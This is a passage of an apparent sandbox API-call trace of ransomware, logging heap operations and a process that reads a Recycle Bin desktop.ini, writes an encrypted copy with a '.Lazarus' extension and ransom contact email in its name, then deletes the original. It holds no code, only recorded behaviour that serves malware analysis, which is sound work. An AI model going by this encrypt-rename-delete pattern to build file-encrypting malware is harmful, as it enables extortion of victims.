hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x31cd0 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0060.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x31cd0 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0060.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.733] AreFileApisANSI () returned 1 [0060.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", lpUsedDefaultChar=0x0) returned 74 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0060.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.733] AreFileApisANSI () returned 1 [0060.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.734] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.734] GetFileType (hFile=0x410) returned 0x1 [0060.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.734] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.734] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.734] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.734] CloseHandle (hObject=0x410) returned 1 [0060.735] AreFileApisANSI () returned 1 [0060.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.735] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.735] GetFileType (hFile=0x410) returned 0x1 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.735] CloseHandle (hObject=0x410) returned 1 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.736] AreFileApisANSI () returned 1 [0060.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.737] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0060.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.737] AreFileApisANSI () returned 1 [0060.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0060.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69bb0 [0060.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x51398 [0060.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0060.738] AreFileApisANSI () returned 1 [0060.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x51398, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0060.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x56280 [0060.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x51398, cbMultiByte=-1, lpWideCharStr=0x56280, cchWideChar=136 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0060.738] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.883] GetFileType (hFile=0x41c) returned 0x1 [0060.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x56280 | out: hHeap=0x20000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.884] AreFileApisANSI () returned 1 [0060.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.884] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.884] GetFileType (hFile=0x424) returned 0x1 [0060.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.884] GetLastError () returned 0x0 [0060.884] SetLastError (dwErrCode=0x0) [0060.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.884] GetLastError () returned 0x0 [0060.885] SetLastError (dwErrCode=0x0) [0060.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.885] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f030*=0x81, lpOverlapped=0x0) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.885] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0060.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0060.885] GetLastError () returned 0x0 [0060.885] SetLastError (dwErrCode=0x0) [0060.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1) returned 0x7cfa0 [0060.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0060.886] GetLastError () returned 0x0 [0060.886] SetLastError (dwErrCode=0x0) [0060.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0060.886] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327ef70*=0x90, lpOverlapped=0x0) returned 1 [0060.887] GetLastError () returned 0x0 [0060.887] SetLastError (dwErrCode=0x0) [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.887] GetLastError () returned 0x0 [0060.887] SetLastError (dwErrCode=0x0) [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0060.887] CloseHandle (hObject=0x41c) returned 1 [0060.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.887] CloseHandle (hObject=0x424) returned 1 [0060.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.888] AreFileApisANSI () returned 1 [0060.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.888] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.888] GetLastError () returned 0x5 [0060.888] GetLastError () returned 0x5 [0060.888] SetLastError (dwErrCode=0x5) [0060.888] GetLastError () returned 0x5 [0060.888] SetLastError (dwErrCode=0x5) [0060.888] GetLastError () returned 0x5 [0060.888] SetLastError (dwErrCode=0x5) [0060.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.888] GetLastError () returned 0x5 [0060.888] SetLastError (dwErrCode=0x5) [0060.888] AreFileApisANSI () returned 1 [0060.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.888] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0060.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.890] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x38, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x20320, ftLastWriteTime.dwLowDateTime=0x1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x15, 